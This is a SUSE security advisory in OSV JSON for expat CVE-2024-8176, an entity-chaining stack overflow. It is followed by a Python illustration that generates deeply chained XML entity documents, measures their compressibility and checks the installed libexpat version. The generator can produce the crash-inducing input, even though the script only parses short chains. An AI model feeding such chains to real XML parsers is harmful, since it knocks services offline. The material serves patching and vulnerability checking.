{"affected":[{"ecosystem_specific":{"binaries":[{"expat":"2.7.1-150700.3.3.1","libexpat-devel":"2.7.1-150700.3.3.1","libexpat1":"2.7.1-150700.3.3.1","libexpat1-32bit":"2.7.1-150700.3.3.1"}]},"package":{"ecosystem":"SUSE:Linux Enterprise Module for Basesystem 15 SP7","name":"expat","purl":"pkg:rpm/suse/expat&distro=SUSE%20Linux%20Enterprise%20Module%20for%20Basesystem%2015%20SP7"},"ranges":[{"events":[{"introduced":"0"},{"fixed":"2.7.1-150700.3.3.1"}],"type":"ECOSYSTEM"}]}],"aliases":[],"details":"This update for expat fixes the following issues:\n\nexpat was updated to version 2.7.1:\n\n  -  Bug fixes:\n\n       - Restore event pointer behavior from Expat 2.6.4\n        (that the fix to CVE-2024-8176 changed in 2.7.0);\n        affected API functions are:\n\n                    - XML_GetCurrentByteCount\n                    - XML_GetCurrentByteIndex\n                    - XML_GetCurrentColumnNumber\n                    - XML_GetCurrentLineNumber\n                    - XML_GetInputContext\n  -  Other changes:\n\n       - Fix printf format specifiers for 32bit Emscripten\n       - docs: Promote OpenSSF Best Practices self-certification\n       - tests/benchmark: Resolve mistaken double close\n       - Address compiler warnings\n       - Version info bumped from 11:1:10 (libexpat*.so.1.10.1)\n         to 11:2:10 (libexpat*.so.1.10.2); see https://verbump.de/\n         for what these numbers do\n\nVersion update to 2.7.0 (CVE-2024-8176, bsc#1239618, jsc#PED-12507)\n\n* Security fixes:\n\n- CVE-2024-8176 -- Fix crash from chaining a large number of\n  entities caused by stack overflow by resolving use of recursion,\n  for all three uses of entities: - general entities in character data\n  ('<e>&g1;</e>') - general entities in attribute values\n  ('<e k1='&g1;'/>') - parameter entities ('%p1;')\n\n  Known impact is (reliable and easy) denial of service:\n  CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:H/RL:O/RC:C\n  (Base Score: 7.5, Temporal Score: 7.2)\n  Please note that a layer of compression around XML can\n  significantly reduce the minimum attack payload size.\n\n* Other changes:\n  - docs: Add missing documentation of error code XML_ERROR_NOT_STARTED\n    that was introduced with 2.6.4\n  - docs: Document need for C++11 compiler for use from C++\n  - Address Cppcheck warnings\n  - Mass-migrate links from http:// to https://\n\n  - Document changes since the previous release\n  - Version info bumped from 11:0:10 (libexpat*.so.1.10.0)\n    to 11:1:10 (libexpat*.so.1.10.1); see https://verbump.de/\n    for what these numbers do\n","id":"SUSE-SU-2025:03239-1","modified":"2025-09-16T17:04:04Z","published":"2025-09-16T17:04:04Z","references":[{"type":"ADVISORY","url":"https://www.suse.com/support/update/announcement/2025/suse-su-202503239-1/"},{"type":"REPORT","url":"https://bugzilla.suse.com/1239618"},{"type":"WEB","url":"https://www.suse.com/security/cve/CVE-2024-8176"}],"related":["CVE-2024-8176"],"summary":"Security update for expat","upstream":["CVE-2024-8176"]}
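The advisory describes CVE-2024-8176 as a stack overflow reached by chaining entities (general entities in character data, general entities in attribute values, parameter entities), and notes that compression shrinks the minimum payload. The following Python is an added illustration, not code from SUSE or from the expat project: it builds the two general-entity chain shapes the advisory quotes, confirms with a short, harmless chain that each link resolves to the next, measures how well gzip compresses a long chain, and reports which libexpat the interpreter has loaded. Assumptions: `xml.parsers.expat` (pyexpat) binds whatever libexpat Python was built against or loads at runtime, which is not necessarily the SUSE `libexpat1` package; the chain depths, the entity names `g1..gN` and the leaf text are constructed for the example; the parameter-entity variant (`%p1;`) is not generated here because internal-subset parameter entities cannot be chained inside entity values without an external subset.

```python
import gzip
import xml.parsers.expat as expat

# Upstream release that replaced the recursive entity handling (per the advisory text).
FIXED_IN = (2, 7, 0)


def chained_entity_doc(depth, variant="chardata", leaf="leaf"):
    """Build a document whose general entities form a chain g1 -> g2 -> ... -> g<depth> -> leaf.

    variant "chardata": the chain is referenced in element content,  '<e>&g1;</e>'
    variant "attr":     the chain is referenced in an attribute value, '<e k1="&g1;"/>'
    Entity names and leaf text are constructed for this example; each link costs
    roughly 25 bytes of input regardless of depth.
    """
    decls = [f'<!ENTITY g{i} "&g{i + 1};">' for i in range(1, depth)]
    decls.append(f'<!ENTITY g{depth} "{leaf}">')
    dtd = "<!DOCTYPE e [" + "".join(decls) + "]>"
    if variant == "chardata":
        body = "<e>&g1;</e>"
    elif variant == "attr":
        body = '<e k1="&g1;"/>'
    else:
        raise ValueError(f"unknown variant {variant!r}")
    return dtd + body


def expand(doc, variant="chardata"):
    """Parse doc with the libexpat linked into this Python and return what &g1; resolved to."""
    parser = expat.ParserCreate()
    parser.buffer_text = True
    collected = []
    if variant == "chardata":
        parser.CharacterDataHandler = collected.append
    else:
        parser.StartElementHandler = lambda name, attrs: collected.append(attrs["k1"])
    parser.Parse(doc, True)
    return "".join(collected)


def linked_expat_is_fixed():
    """True when the loaded libexpat is at least 2.7.0; version_info is a (major, minor, micro) tuple."""
    return tuple(expat.version_info) >= FIXED_IN


def compression_ratio(doc):
    """Raw size divided by gzip size; the chain is repetitive, so the on-the-wire payload is small."""
    raw = doc.encode("utf-8")
    return len(raw) / len(gzip.compress(raw, compresslevel=9))


if __name__ == "__main__":
    print("loaded libexpat:", expat.EXPAT_VERSION, "at or above 2.7.0:", linked_expat_is_fixed())
    # A depth of 50 is far below anything that could exhaust the C stack, so this is safe
    # to run even against an unpatched library.
    for variant in ("chardata", "attr"):
        doc = chained_entity_doc(50, variant)
        print(f"{variant}: depth-50 chain expands to {expand(doc, variant)!r}")
    big = chained_entity_doc(20000)
    print(f"depth 20000: {len(big)} bytes raw, gzip shrinks it {compression_ratio(big):.1f}x")
    # Deliberately not parsed: on an unpatched libexpat a sufficiently long chain can exhaust
    # the C stack and crash the process, which is the denial of service the advisory describes.
```

The version test only tells you about the libexpat that this Python process loaded, which may be a copy bundled with the interpreter rather than the system library; on the SUSE hosts this advisory covers, check the package directly with `rpm -q libexpat1` and compare against the fixed build 2.7.1-150700.3.3.1 listed above.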